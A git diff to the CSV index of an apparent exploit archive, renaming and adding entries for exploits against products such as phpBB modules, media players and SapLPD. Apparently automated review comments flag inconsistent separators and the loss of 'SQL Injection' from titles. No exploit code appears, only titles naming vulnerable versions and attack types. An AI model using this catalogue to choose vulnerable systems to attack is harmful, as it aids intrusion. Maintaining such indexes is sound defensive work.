diff --git a/files.csv b/files.csv
index b0adf05ad..5f103298b 100644
--- a/files.csv
+++ b/files.csv
@@ -896,7 +896,7 @@ id,file,description,date,author,platform,type,port
 7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC)",2009-01-02,"aBo MoHaMeD",windows,dos,0
 7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)",2009-01-03,Encrypt3d.M!nd,windows,dos,0
 7673,platforms/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0
-7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - (marquee) Denial of Service",2009-01-06,StAkeR,multiple,dos,0
+7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - Denial of Service",2009-01-06,StAkeR,multiple,dos,0
 7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - (user) Remote Buffer Overflow (PoC)",2009-01-07,Houssamix,windows,dos,0
 7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - '.aup' Remote Off-by-One Crash",2009-01-07,Stack,windows,dos,0
 7696,platforms/windows/dos/7696.pl,"Winamp GEN_MSN Plugin - Heap Buffer Overflow (PoC)",2009-01-07,SkD,windows,dos,0
@@ -5335,10 +5335,11 @@ id,file,description,date,author,platform,type,port
 40985,platforms/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,linux,dos,0
 40994,platforms/multiple/dos/40994.html,"Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing",2017-01-08,"Aaditya Purani",multiple,dos,0
 40996,platforms/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",php,dos,0
-41008,platforms/multiple/dos/41008.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption",2017-01-11,COSIG,multiple,dos,0
+41008,platforms/multiple/dos/41008.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (1)",2017-01-11,COSIG,multiple,dos,0
 41012,platforms/multiple/dos/41012.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (2)",2017-01-11,COSIG,multiple,dos,0
 41018,platforms/windows/dos/41018.txt,"Boxoft Wav 1.0 - Buffer Overflow",2017-01-11,Vulnerability-Lab,windows,dos,0
 41025,platforms/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",windows,dos,0
+41030,platforms/windows/dos/41030.py,"SapLPD 7.40 - Denial of Service",2016-12-28,"Peter Baris",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -5967,7 +5968,7 @@ id,file,description,date,author,platform,type,port
 7681,platforms/linux/local/7681.txt,"Debian XTERM - (DECRQSS/comments)",2009-01-06,"Paul Szabo",linux,local,0
 7684,platforms/windows/local/7684.pl,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-01-06,Encrypt3d.M!nd,windows,local,0
 7688,platforms/windows/local/7688.pl,"Cain & Abel 4.9.25 - (Cisco IOS-MD5) Local Buffer Overflow",2009-01-07,send9,windows,local,0
-7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - (PlaylistSkin) Buffer Overflow",2009-01-07,"Jeremy Brown",windows,local,0
+7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - 'PlaylistSkin' Buffer Overflow",2009-01-07,"Jeremy Brown",windows,local,0
 7695,platforms/windows/local/7695.pl,"VUPlayer 2.49 - '.pls' Universal Buffer Overflow",2009-01-07,SkD,windows,local,0
 7702,platforms/windows/local/7702.c,"GOM Player 2.0.12.3375 - '.asx' Stack Overflow",2009-01-08,DATA_SNIPER,windows,local,0
 7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) - Language Catalog SEH Overflow",2009-01-08,Cnaph,windows,local,0
@@ -6501,7 +6502,7 @@ id,file,description,date,author,platform,type,port
 14630,platforms/windows/local/14630.py,"Mediacoder 0.7.5.4710 - 'Universal' Buffer Overflow (SEH)",2010-08-12,Dr_IDE,windows,local,0
 14633,platforms/windows/local/14633.py,"Xion Player 1.0.125 - Stack Buffer Overflow",2010-08-13,corelanc0d3r,windows,local,0
 14676,platforms/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 - '.m3u' Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local,0
-14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 - Buffer Overflow (SEH) (2)",2010-08-15,dijital1,windows,local,0
+14651,platforms/windows/local/14651.py,"Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (2)",2010-08-15,dijital1,windows,local,0
 14663,platforms/windows/local/14663.py,"MUSE 4.9.0.006 - '.m3u' Local Buffer Overflow",2010-08-16,"Glafkos Charalambous",windows,local,0
 14664,platforms/windows/local/14664.py,"MUSE 4.9.0.006 - '.pls' Local Universal Buffer Overflow (SEH)",2010-08-16,"Glafkos Charalambous",windows,local,0
 14673,platforms/windows/local/14673.py,"Triologic Media Player 8 - '.m3u' Local Universal Unicode Buffer Overflow (SEH)",2010-08-17,"Glafkos Charalambous",windows,local,0
@@ -7369,6 +7370,7 @@ id,file,description,date,author,platform,type,port
 20409,platforms/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 - Weak Encryption",2000-11-18,"Steven Alexander",windows,local,0
 20410,platforms/unix/local/20410.cpp,"Jan Hubicka Koules 1.4 - Svgalib Buffer Overflow",2000-11-20,Synnergy.net,unix,local,0
 20411,platforms/linux/local/20411.c,"Oracle 8.x - cmctl Buffer Overflow",2000-11-20,anonymous,linux,local,0
+41031,platforms/windows/local/41031.txt,"aSc Timetables 2017 - Buffer Overflow",2017-01-12,"Peter Baris",windows,local,0
 20417,platforms/osx/local/20417.c,"Tunnelblick - Privilege Escalation (1)",2012-08-11,zx2c4,osx,local,0
 20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0
 20436,platforms/unix/local/20436.sh,"Apple Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell redirection Race Condition",2000-01-02,proton,unix,local,0
@@ -8060,7 +8062,7 @@ id,file,description,date,author,platform,type,port
 28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow (SEH)",2013-10-14,metacom,windows,local,0
 28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Buffer Overflow (SEH)",2013-10-15,metacom,windows,local,0
 28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0
-40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
+40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based + Gentoo) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
 29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0
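Review bot: The new title for 40768 uses `+` as a list separator (`Debian-Based + Gentoo`), while other rows visible in this diff separate alternatives with ` / `, and the 41021 row in the next hunk is changed from `+` to `/`. For consistency I would write `"Nginx (Debian-Based / Gentoo) - 'logrotate' Local Privilege Escalation"`. A single separator keeps text searches and scripts that split titles predictable for people matching this index against their installed software.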
@@ -8750,7 +8752,7 @@ id,file,description,date,author,platform,type,port
 40995,platforms/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,windows,local,0
 41015,platforms/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",windows,local,0
 41020,platforms/windows/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,windows,local,0
-41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak + Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
+41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
 41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
@@ -8928,7 +8930,7 @@ id,file,description,date,author,platform,type,port
 398,platforms/linux/remote/398.c,"rsync 2.5.1 - Remote Exploit (1)",2002-01-01,Teso,linux,remote,873
 399,platforms/linux/remote/399.c,"rsync 2.5.1 - Remote Exploit (2)",2002-01-01,Teso,linux,remote,873
 400,platforms/linux/remote/400.c,"GV PostScript Viewer - Remote Buffer Overflow (2)",2004-08-18,infamous41md,linux,remote,0
-404,platforms/linux/remote/404.pl,"PlaySMS 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote,0
+404,platforms/linux/remote/404.pl,"PlaySms 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote,0
 405,platforms/linux/remote/405.c,"XV 3.x - BMP Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,remote,0
 408,platforms/linux/remote/408.c,"Qt - '.bmp' Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote,0
 409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23
@@ -10519,7 +10521,7 @@ id,file,description,date,author,platform,type,port
 16335,platforms/windows/remote/16335.rb,"WinComLPD 3.0.2 - Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
 16336,platforms/windows/remote/16336.rb,"NIPrint LPD - Request Overflow (Metasploit)",2010-12-25,Metasploit,windows,remote,0
 16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
-16338,platforms/windows/remote/16338.rb,"SAP SAPLPD 6.28 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
+16338,platforms/windows/remote/16338.rb,"SapLPD 6.28 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16339,platforms/windows/remote/16339.rb,"Motorola Timbuktu Pro - Directory Traversal / Arbitrary File Upload (Metasploit)",2010-11-24,Metasploit,windows,remote,0
 16340,platforms/windows/remote/16340.rb,"Oracle 8i - TNS Listener 'ARGUMENTS' Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0
 16341,platforms/windows/remote/16341.rb,"Oracle 8i - TNS Listener SERVICE_NAME Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0
@@ -11782,6 +11784,7 @@ id,file,description,date,author,platform,type,port
 20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 - JSP Source Disclosure",2000-11-21,"Wojciech Woch",jsp,remote,0
 20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - bb-hist.sh HISTFILE Parameter File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0
 20414,platforms/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,unix,remote,0
+20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script (MS00-090)",2000-11-22,"Sandro Gauci",windows,remote,0
 20423,platforms/cgi/remote/20423.txt,"NCSA httpd-campas 1.2 - sample script Exploit",1997-07-15,"Francisco Torres",cgi,remote,0
 20425,platforms/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",multiple,remote,0
 20426,platforms/windows/remote/20426.html,"Microsoft Internet Explorer 5.5 - 'Index.dat' Exploit (MS00-055)",2000-11-23,"Georgi Guninski",windows,remote,0
@@ -15892,7 +15895,7 @@ id,file,description,date,author,platform,type,port
 873,platforms/php/webapps/873.txt,"phpDEV5 - Remote Default Insecure Users",2005-03-11,Ali7,php,webapps,0
 881,platforms/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,php,webapps,0
 889,platforms/php/webapps/889.pl,"phpBB 2.0.12 - Change User Rights Authentication Bypass",2005-03-21,Kutas,php,webapps,0
-892,platforms/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass (SQL Injection)",2005-03-21,kre0n,php,webapps,0
+892,platforms/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass",2005-03-21,kre0n,php,webapps,0
 897,platforms/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,php,webapps,0
 901,platforms/php/webapps/901.pl,"PunBB 1.2.2 - Authentication Bypass",2005-03-29,RusH,php,webapps,0
 907,platforms/php/webapps/907.pl,"phpBB 2.0.13 - 'downloads.php' mod Remote Exploit",2005-04-02,CereBrums,php,webapps,0
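Review bot: Dropping `(SQL Injection)` from the 892 title removes the vulnerability class from the only free-text column of this index; the header row lists just id, file, description, date, author, platform, type and port. A search of the index for "SQL Injection" will no longer return this entry, and the same loss occurs in the later hunks for 925, 1472, 7602, 7666, 7682, 7711, 7719, 7726, 7728, 7758, 7759, 7800 to 7803, 7807 and 7817. Anyone using the index to check whether a deployed product has a known injection flaw would miss these rows. I would keep the class in the title, as in the previous wording `"phpMyFamily 1.4.0 - Authentication Bypass (SQL Injection)"`.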
@@ -15901,7 +15904,7 @@ id,file,description,date,author,platform,type,port
 922,platforms/cgi/webapps/922.pl,"The Includer CGI 1.0 - Remote Command Execution (2)",2005-04-08,GreenwooD,cgi,webapps,0
 30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0
 923,platforms/cgi/webapps/923.pl,"The Includer CGI 1.0 - Remote Command Execution (3)",2005-04-08,K-C0d3r,cgi,webapps,0
-925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Admin Authentication Bypass (SQL Injection)",2005-04-09,LaMeR,asp,webapps,0
+925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Authentication Bypass",2005-04-09,LaMeR,asp,webapps,0
 928,platforms/php/webapps/928.py,"PunBB 1.2.4 - 'id' Parameter SQL Injection",2005-04-11,"Stefan Esser",php,webapps,0
 939,platforms/php/webapps/939.pl,"S9Y Serendipity 0.8beta4 - exit.php SQL Injection",2005-04-13,kre0n,php,webapps,0
 954,platforms/cgi/webapps/954.pl,"E-Cart 1.1 - (index.cgi) Remote Command Execution",2005-04-25,z,cgi,webapps,0
@@ -16050,7 +16053,7 @@ id,file,description,date,author,platform,type,port
 1468,platforms/php/webapps/1468.php,"Clever Copy 3.0 - Admin Auth Details / SQL Injection",2006-02-04,rgod,php,webapps,0
 1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 - (Style Changer/Demo Mod) SQL Injection",2006-02-05,SkOd,php,webapps,0
 1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution",2006-02-06,Hessam-x,cgi,webapps,0
-1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - (Authentication Bypass) SQL Injection",2006-02-06,Zodiac,asp,webapps,0
+1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - Authentication Bypass",2006-02-06,Zodiac,asp,webapps,0
 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
 1482,platforms/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
 1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager connector.php) Arbitrary File Upload",2006-02-09,rgod,php,webapps,0
@@ -16656,7 +16659,7 @@ id,file,description,date,author,platform,type,port
 2387,platforms/asp/webapps/2387.txt,"Charon Cart 3.0 - (Review.asp) SQL Injection",2006-09-17,ajann,asp,webapps,0
 2388,platforms/php/webapps/2388.txt,"CMtextS 1.0 - (users_logins/admin.txt) Credentials Disclosure",2006-09-17,Kacper,php,webapps,0
 2389,platforms/php/webapps/2389.pl,"Alstrasoft e-Friends 4.85 - Remote Command Execution",2006-09-18,Kw3[R]Ln,php,webapps,0
-2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - 'phpbb_root_path' Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0
+2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - 'phpbb_root_path' Parameter Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0
 2391,platforms/php/webapps/2391.php,"Exponent CMS 0.96.3 - (view) Remote Command Execution",2006-09-19,rgod,php,webapps,0
 2392,platforms/php/webapps/2392.txt,"Pie Cart Pro - (Home_Path) Remote File Inclusion",2006-09-19,"Saudi Hackrz",php,webapps,0
 2393,platforms/php/webapps/2393.txt,"Pie Cart Pro - (Inc_Dir) Remote File Inclusion",2006-09-19,SnIpEr_SA,php,webapps,0
@@ -17036,7 +17039,7 @@ id,file,description,date,author,platform,type,port
 2888,platforms/php/webapps/2888.php,"Envolution 1.1.0 - (PNSVlang) Remote Code Execution",2006-12-03,Kacper,php,webapps,0
 2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 - (categories.php) Local File Inclusion",2006-12-03,r0ut3r,php,webapps,0
 2890,platforms/php/webapps/2890.txt,"PHP-revista 1.1.2 - (adodb) Multiple Remote File Inclusion",2006-12-03,"Cold Zero",php,webapps,0
-2891,platforms/php/webapps/2891.txt,"cutenews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion",2006-12-04,DeltahackingTEAM,php,webapps,0
+2891,platforms/php/webapps/2891.txt,"CuteNews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion",2006-12-04,DeltahackingTEAM,php,webapps,0
 2894,platforms/php/webapps/2894.txt,"Phorum 3.2.11 - 'common.php' Remote File Inclusion",2006-12-06,Mr-m07,php,webapps,0
 2895,platforms/php/webapps/2895.pl,"J-OWAMP Web Interface 2.1b - (link) Remote File Inclusion",2006-12-07,3l3ctric-Cracker,php,webapps,0
 2896,platforms/php/webapps/2896.txt,"Tucows Client Code Suite (CSS) 1.2.1015 - File Inclusion",2006-12-08,3l3ctric-Cracker,php,webapps,0
@@ -17387,7 +17390,7 @@ id,file,description,date,author,platform,type,port
 3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 - 'ROOT_PATH' Remote File Inclusion",2007-03-13,the_day,php,webapps,0
 3473,platforms/php/webapps/3473.txt,"WebCreator 0.2.6-rc3 - (moddir) Remote File Inclusion",2007-03-13,the_day,php,webapps,0
 3476,platforms/php/webapps/3476.pl,"Zomplog 3.7.6 (Windows x86) - Local File Inclusion",2007-03-14,Bl0od3r,php,webapps,0
-3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - (comments.php id) SQL Injection",2007-03-14,WiLdBoY,php,webapps,0
+3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - 'id' Parameter SQL Injection",2007-03-14,WiLdBoY,php,webapps,0
 3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 - 'postpost.php' Remote Code Execution",2007-03-14,Dj7xpl,php,webapps,0
 3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 - Remote Authentication Bypass",2007-03-15,WiLdBoY,asp,webapps,0
 3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - (usergroups.php) SQL Injection",2007-03-15,x666,php,webapps,0
@@ -17729,7 +17732,7 @@ id,file,description,date,author,platform,type,port
 4020,platforms/php/webapps/4020.php,"RevokeBB 1.0 RC4 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0
 4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion",2007-06-01,GoLd_M,php,webapps,0
 4025,platforms/php/webapps/4025.php,"Quick.Cart 2.2 - Remote File Inclusion / Local File Inclusion Remote Code Execution",2007-06-02,Kacper,php,webapps,0
-4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - (index.php c) SQL Injection",2007-06-03,Kacper,php,webapps,0
+4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - 'index.php' SQL Injection",2007-06-03,Kacper,php,webapps,0
 4029,platforms/php/webapps/4029.php,"Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution",2007-06-04,Silentz,php,webapps,0
 4030,platforms/php/webapps/4030.php,"EQdkp 1.3.2 - 'listmembers.php' SQL Injection",2007-06-04,Silentz,php,webapps,0
 4031,platforms/php/webapps/4031.txt,"Madirish Webmail 2.0 - (addressbook.php) Remote File Inclusion",2007-06-04,BoZKuRTSeRDaR,php,webapps,0
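Review bot: The new 4026 title keeps the file name but drops the `c` from `(index.php c)`, whereas the 3477 row in the previous hunk is normalised the other way, to `'id' Parameter`. If `c` is the affected parameter, as the old `(file parameter)` pattern suggests, `"PNPHPBB2 <= 1.2 - 'c' Parameter SQL Injection"` would follow the same convention and keep the detail a defender needs to locate the affected input. The product is also spelled `PNphpBB2` in rows 2390 and 7658 of this diff but `PNPHPBB2` here and in 4147 and 4796; settling on one spelling would make product searches of the index reliable.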
@@ -17806,7 +17809,7 @@ id,file,description,date,author,platform,type,port
 4142,platforms/php/webapps/4142.txt,"Girlserv ads 1.5 - (details_news.php) SQL Injection",2007-07-03,"Cold Zero",php,webapps,0
 4144,platforms/php/webapps/4144.php,"MyCMS 0.9.8 - Remote Command Execution (2)",2007-07-03,BlackHawk,php,webapps,0
 4145,platforms/php/webapps/4145.php,"MyCMS 0.9.8 - Remote Command Execution (1)",2007-07-03,BlackHawk,php,webapps,0
-4147,platforms/php/webapps/4147.php,"PNPHPBB2 <= 1.2i - viewforum.php SQL Injection",2007-07-03,Coloss,php,webapps,0
+4147,platforms/php/webapps/4147.php,"PNPHPBB2 <= 1.2i - 'viewforum.php' SQL Injection",2007-07-03,Coloss,php,webapps,0
 4150,platforms/php/webapps/4150.txt,"VRNews 1.1.1 - 'admin.php' Remote Security Bypass",2007-07-05,R4M!,php,webapps,0
 4151,platforms/php/webapps/4151.sh,"AsteriDex 3.0 - (callboth.php) Remote Code Execution",2007-07-05,"Carl Livitt",php,webapps,0
 4153,platforms/php/webapps/4153.txt,"PHPVID 0.9.9 - 'categories_type.php' SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0
@@ -18213,7 +18216,7 @@ id,file,description,date,author,platform,type,port
 4793,platforms/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A - (all modules) SQL Injection",2007-12-26,JosS,php,webapps,0
 4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - Local File Inclusion / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0
 4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0
-4796,platforms/php/webapps/4796.txt,"PNPHPBB2 <= 1.2i - (printview.php PHPEx) Local File Inclusion",2007-12-26,irk4z,php,webapps,0
+4796,platforms/php/webapps/4796.txt,"PNPHPBB2 <= 1.2i - 'PHPEx' Parameter Local File Inclusion",2007-12-26,irk4z,php,webapps,0
 4798,platforms/php/webapps/4798.php,"ZeusCMS 0.3 - Blind SQL Injection",2007-12-27,EgiX,php,webapps,0
 4799,platforms/php/webapps/4799.txt,"Joovili 3.0.6 - 'joovili.images.php' Remote File Disclosure",2007-12-27,EcHoLL,php,webapps,0
 4800,platforms/php/webapps/4800.txt,"xml2owl 0.1.1 - showcode.php Remote Command Execution",2007-12-28,MhZ91,php,webapps,0
@@ -20378,7 +20381,7 @@ id,file,description,date,author,platform,type,port
 7599,platforms/asp/webapps/7599.txt,"ForumApp 3.3 - Remote Database Disclosure",2008-12-28,Cyber.Zer0,asp,webapps,0
 7600,platforms/php/webapps/7600.pl,"Flexphplink Pro - Arbitrary File Upload",2008-12-28,Osirys,php,webapps,0
 7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0
-7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - (Authentication Bypass) SQL Injection",2008-12-29,AnGeL25dZ,php,webapps,0
+7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - Authentication Bypass",2008-12-29,AnGeL25dZ,php,webapps,0
 7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
 7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
 7605,platforms/php/webapps/7605.php,"TaskDriver 1.3 - Remote Change Admin Password",2008-12-29,cOndemned,php,webapps,0
@@ -20416,29 +20419,29 @@ id,file,description,date,author,platform,type,port
 7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting",2009-01-02,ahmadbady,php,webapps,0
 7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection",2009-01-03,darkjoker,php,webapps,0
 7653,platforms/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,php,webapps,0
-7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0
-7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0
-7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' SQL Injection",2009-01-04,DaiMon,php,webapps,0
+7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Parameter Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0
+7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 1.2i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0
+7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' Parameter SQL Injection",2009-01-04,DaiMon,php,webapps,0
 7660,platforms/php/webapps/7660.txt,"PHPMesFilms 1.0 - (index.php id) SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0
 7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 - 'id' SQL Injection",2009-01-04,ZoRLu,php,webapps,0
 7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 - Blind SQL Injection",2009-01-04,darkjoker,php,webapps,0
 7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro - 'acc.mdb' Database Disclosure",2009-01-05,ByALBAYX,asp,webapps,0
-7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro - (Authentication Bypass) SQL Injection",2009-01-05,ByALBAYX,asp,webapps,0
+7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro - Authentication Bypass",2009-01-05,ByALBAYX,asp,webapps,0
 7667,platforms/php/webapps/7667.txt,"Joomla! Component simple_review 1.x - SQL Injection",2009-01-05,EcHoLL,php,webapps,0
 7668,platforms/php/webapps/7668.pl,"Cybershade CMS 0.2b - 'index.php' Remote File Inclusion",2009-01-05,JosS,php,webapps,0
 7669,platforms/php/webapps/7669.pl,"Joomla! Component com_na_newsdescription - (newsid) SQL Injection",2009-01-05,EcHoLL,php,webapps,0
-7670,platforms/php/webapps/7670.pl,"Joomla! Component com_phocadocumentation - 'id' SQL Injection",2009-01-05,EcHoLL,php,webapps,0
-7672,platforms/php/webapps/7672.txt,"phpauctionsystem - Cross-Site Scripting / SQL Injection",2009-01-05,x0r,php,webapps,0
+7670,platforms/php/webapps/7670.pl,"Joomla! Component com_phocadocumentation - 'id' Parameter SQL Injection",2009-01-05,EcHoLL,php,webapps,0
+7672,platforms/php/webapps/7672.txt,"PHPAuctionSystem - Cross-Site Scripting / SQL Injection",2009-01-05,x0r,php,webapps,0
 7674,platforms/php/webapps/7674.txt,"PHPAuctionSystem - Insecure Cookie Handling",2009-01-05,ZoRLu,php,webapps,0
